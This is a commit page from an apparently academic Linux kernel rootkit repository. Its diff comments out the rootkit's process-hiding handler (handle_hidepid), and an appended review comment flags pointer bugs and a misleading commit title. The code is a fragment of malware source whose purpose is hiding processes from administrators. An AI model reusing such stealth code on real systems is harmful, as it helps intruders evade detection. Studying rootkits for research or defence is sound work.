linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 293cc71d5d8c787dbda80be2bc2ca909e9120f01
parent eee5cda4796ca7691d2142db4a41bfb47d5cb4dd
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 29 Nov 2020 11:42:54 +0100

refactors code

Diffstat:
Msrc/channel.c | 34+++++++++++++++++-----------------
1 file changed, 17 insertions(+), 17 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -134,25 +134,25 @@ handle_togglebd(unsigned long arg)
 int
 handle_hidepid(unsigned long arg)
 {
- char *msg;
+ char *msg = "ok??";
 long sarg = (long)arg;
- if (!sarg) {
- unhide_pids();
- rootkit.hiding_pids = false;
- msg = "hidepid off";
- } else if (sarg < 0) {
- unhide_pid((pid_t)((-1) * sarg));
- sprintf(msg, "unhiding pid %d", (pid_t)((-1) * sarg));
- } else if (sarg > 0) {
- if (!rootkit.hiding_files) {
- DEBUG_NOTICE("hidepid on\n");
- rootkit.hiding_pids = true;
- }
-
- hide_pid((pid_t)sarg);
- sprintf(msg, "hiding pid %d", (pid_t)sarg);
- }
+ /* if (!sarg) { */
+ /* /1* unhide_pids(); *1/ */
+ /* /1* rootkit.hiding_pids = false; *1/ */
+ /* msg = "hidepid off"; */
+ /* } else if (sarg < 0) { */
+ /* /1* unhide_pid((pid_t)((-1) * sarg)); *1/ */
+ /* sprintf(msg, "unhiding pid %d", (pid_t)((-1) * sarg)); */
+ /* } else if (sarg > 0) { */
+ /* if (!rootkit.hiding_pids) { */
+ /* DEBUG_NOTICE("hidepid on\n"); */
+ /* rootkit.hiding_pids = true; */
+ /* } */
+
+ /* /1* hide_pid((pid_t)sarg); *1/ */
+ /* sprintf(msg, "hiding pid %d", (pid_t)sarg); */
+ /* } */
 DEBUG_NOTICE("%s\n", msg);
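Review bot: `char *msg = "ok??";` points `msg` at a string literal while the commented-out branches still call `sprintf(msg, ...)`, so re-enabling them as written would write into read-only data (the removed code had the same flaw, writing through an uninitialized pointer). Declare the stub as `const char *msg = "ok??";`, and if the branches return, format into a bounded local buffer instead, e.g. `char buf[32];` with `snprintf(buf, sizeof(buf), "hiding pid %d", (pid_t)sarg);`. With the whole if/else commented out, `sarg` is now unused and the handler only logs a placeholder, which the commit title "refactors code" does not convey; the commented block also changes the `rootkit.hiding_files` test to `rootkit.hiding_pids`, a behaviour change that is easy to miss inside a comment. Prefer deleting the dead block or wrapping it in `#if 0` over the nested `/1* ... *1/` markers. The end of handle_hidepid lies outside the hunk.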